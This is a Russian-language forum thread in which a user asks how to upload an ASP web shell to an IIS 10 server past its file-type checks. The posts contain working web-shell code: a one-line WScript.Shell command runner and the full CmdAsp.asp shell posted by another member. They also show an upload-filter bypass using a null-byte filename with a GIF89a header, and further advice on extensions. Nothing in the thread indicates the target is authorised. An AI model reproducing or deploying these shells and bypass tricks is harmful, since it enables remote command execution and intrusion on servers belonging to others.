• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Ошибка при загрузки оболочки asp

Frintezza

New member
30.01.2023
3
0
BIT
0
Привет) пытаюсь загрузить оболочку но сервер выдает ошибку
по началу сервер не давал закидавать .asp файл

file.asp
ASP.net:
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

потом я это обошел так:

file.asp%00.jpg
ASP.net:
GIF89a;

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

теперь сервер выдает ошибку:

Persits.Jpeg.1 error '8004002b'

Premature end of input file

/ScriptLibrary/incSIP2Class.asp, line 1749

IIS-10

не уверень в коде который я гружу так как не понимаю asp.net
есть какие нибуль варианты обхода и загрузки шела ?
 

Вложения

  • asp-error.png
    asp-error.png
    2,9 КБ · Просмотры: 238

Exited3n

Red Team
10.05.2022
693
248
BIT
538
Вот asp шелл:

ASP.net:
<%@ Language=VBScript %>
<%
  ' --------------------o0o--------------------
  '  File:    CmdAsp.asp
  '  Author:  Maceo <maceo @ dogmile.com>
  '  Release: 2000-12-01
  '  OS:      Windows 2000, 4.0 NT
  ' -------------------------------------------

  Dim oScript
  Dim oScriptNet
  Dim oFileSys, oFile
  Dim szCMD, szTempFile

  On Error Resume Next

  ' -- create the COM objects that we will be using -- '
  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

  ' -- check for a command that we have posted -- '
  szCMD = Request.Form(".CMD")
  If (szCMD <> "") Then

    ' -- Use a poor man's pipe ... a temp file -- '
    szTempFile = "C:\" & oFileSys.GetTempName( )
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

  End If

%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
  If (IsObject(oFile)) Then
    ' -- Read the output from our command and remove the temp file -- '
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
  End If
%>
</BODY>
</HTML>
 

Frintezza

New member
30.01.2023
3
0
BIT
0
Вот asp шелл:

ASP.net:
<%@ Language=VBScript %>
<%
  ' --------------------o0o--------------------
  '  File:    CmdAsp.asp
  '  Author:  Maceo <maceo @ dogmile.com>
  '  Release: 2000-12-01
  '  OS:      Windows 2000, 4.0 NT
  ' -------------------------------------------

  Dim oScript
  Dim oScriptNet
  Dim oFileSys, oFile
  Dim szCMD, szTempFile

  On Error Resume Next

  ' -- create the COM objects that we will be using -- '
  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

  ' -- check for a command that we have posted -- '
  szCMD = Request.Form(".CMD")
  If (szCMD <> "") Then

    ' -- Use a poor man's pipe ... a temp file -- '
    szTempFile = "C:\" & oFileSys.GetTempName( )
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
    Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

  End If

%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
  If (IsObject(oFile)) Then
    ' -- Read the output from our command and remove the temp file -- '
    On Error Resume Next
    Response.Write Server.HTMLEncode(oFile.ReadAll)
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
  End If
%>
</BODY>
</HTML>
По понятном причинам я получаю ошибку
Persits.Jpeg.1 error '800a0002'
Access is denied.
/ScriptLibrary/incSIP2Class.asp, line 1749
не знаете ли вы методы одхода ? как я понимаю сервер читает код и понимает что это не картинка и не даем мне загрузить оболочку
 

N1GGA

Codeby Team
Platinum
16.07.2018
326
333
BIT
231
Привет) пытаюсь загрузить оболочку но сервер выдает ошибку
по началу сервер не давал закидавать .asp файл

file.asp
ASP.net:
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

потом я это обошел так:

file.asp%00.jpg
ASP.net:
GIF89a;

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

теперь сервер выдает ошибку:

Persits.Jpeg.1 error '8004002b'

Premature end of input file

/ScriptLibrary/incSIP2Class.asp, line 1749

IIS-10

не уверень в коде который я гружу так как не понимаю asp.net
есть какие нибуль варианты обхода и загрузки шела ?
Ты манипулируешь типом файла, чтобы скрипт принял твой шелл как GIF-изображение, а сам даешь ему название .jpg файла. Попробуй расширение тоже .gif указать. А вообще, очень хороший материал и .
 

Frintezza

New member
30.01.2023
3
0
BIT
0
Ты манипулируешь типом файла, чтобы скрипт принял твой шелл как GIF-изображение, а сам даешь ему название .jpg файла. Попробуй расширение тоже .gif указать. А вообще, очень хороший материал и .
Хай бро, спасибо за ссылки, я с этими материалами был знаком. Пока то что мог нарыть в интернете не помогает . И я побробовал конечно же и gif разширения но это не сработало. Я по прежнему получаю ту же ошибку
Persits.Jpeg.1 error '8004002b'
Premature end of input file
/ScriptLibrary/incSIP2Class.asp, line 1749

Возможно нужно найти другую дырку
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!